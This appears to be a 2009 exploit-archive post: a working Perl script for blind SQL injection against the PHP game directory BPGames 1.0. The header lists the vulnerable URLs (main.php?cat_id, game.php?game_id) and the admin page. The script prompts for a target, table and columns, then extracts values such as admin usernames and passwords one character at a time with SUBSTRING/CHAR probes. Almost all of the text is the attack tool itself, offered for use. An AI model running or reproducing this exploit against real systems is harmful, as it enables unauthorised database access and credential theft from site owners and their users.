BPGames 1.0 SQL Injection

`#[x]===================================================================[x]  
# | AntiSecurity[dot]org |  
#[x]===================================================================[x]  
# | Title : BPGames 1.0 blind SQL Injection Exploit |  
# | Software : BPGames |  
# | Vendor : http://bpowerhouse.info |  
# | Date : 22 September 2009 ( Indonesia ) |  
# | Author : OoN_Boy |  
# | Contact : [email protected] |  
# | Web : http://oonboy.info |  
# | Blog : http://oonboy.blogspot.com |  
#[x]===================================================================[x]  
# | Technology : PHP |  
# | Database : MySQL |  
# | Version : 1.0 |  
# | License : GNU GPL |  
# | Price : $29.90 |  
# | Description : is a game directory site script. The script |   
# | supports multi-language settings. Site users |  
# | can search for games according to categories |  
#[x]===================================================================[x]  
# | Google Dork : gwe ganteng :P |  
#[x]===================================================================[x]  
# | Exploit : http://localhost/[path]/main.php?cat_id=[sql] |  
# | http://localhost/[path]/game.php?game_id=[sql]|  
# | Aadmin Page : http://localhost/[path]/admin/index.php |  
#[x]===================================================================[x]  
# | Greetz : antisecurity.org batamhacker.or.id |  
# | Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|  
# | yooogy mousekill }^-^{ martfella noname s4va |  
# | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |  
# | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|  
#[x]===================================================================[x]  
  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
$cmsapp = 'BPGames';  
$vuln = 'main.php?cat_id='; #change vuln game.php?game_id=  
#vuln = 'game.php?game_id=';  
$string = 'Previous'; #change if any string  
#string = 'Instrucciones';  
$maxlen = 32;  
  
my $OS = "$^O";  
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }  
  
printf "\n  
$cmsapp  
[x]=================================================[x]  
| BPGames 1.0 blind SQL Injection Exploit |  
[x]=================================================[x]  
  
\n";  
  
print " [+] URL Path : "; chomp($web=<STDIN>);  
print " [+] Valid ID : "; chomp($id=<STDIN>);  
print " [+] Table : "; chomp($table=<STDIN>); #table name admins  
print " [+] Columns : "; chomp($columns=<STDIN>); #column username and password  
  
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }  
  
print "\n\n [!] Exploiting $target ...\n\n";  
&get_data;  
print "\n\n [!] Mission completed.\n\n";  
  
sub get_data() {  
@columns = split(/,/, $columns);  
foreach $column (@columns) {  
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";  
syswrite(STDOUT, " [-] $table\@$column> ", 255);  
for (my $i=1; $i<=$maxlen; $i++) {  
my $chr = 0;  
my $found = 0;  
my $char = 48;  
while (!$chr && $char<=57) {  
if(exploit($i,$char) =~ /$string/) {  
$chr = 1;  
$found = 1;  
syswrite(STDOUT,chr($char),1);  
} else { $found = 0; }  
$char++;  
}  
if(!$chr) {  
$char = 97;  
while(!$chr && $char<=122) {  
if(exploit($i,$char) =~ /$string/) {  
$chr = 1;  
$found = 1;  
syswrite(STDOUT,chr($char),1);  
} else { $found = 0; }  
$char++;  
}  
}  
if (!$found) {  
print "\n"; last;  
}  
}  
}  
}  
  
sub exploit() {  
my $limit = $_[0];  
my $chars = $_[1];  
my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')';  
my $inject = $target.$vuln.$id.$blind;  
my $content = get_content($inject);  
return $content;  
}  
  
sub get_content() {  
my $url = $_[0];  
my $req = HTTP::Request->new(GET => $url);  
my $ua = LWP::UserAgent->new();  
$ua->timeout(5);  
my $res = $ua->request($req);  
if ($res->is_error){  
print "\n\n [!] Error, ".$res->status_line.".\n\n";  
exit;  
}  
return $res->content;  
}  
  
# Exploit End`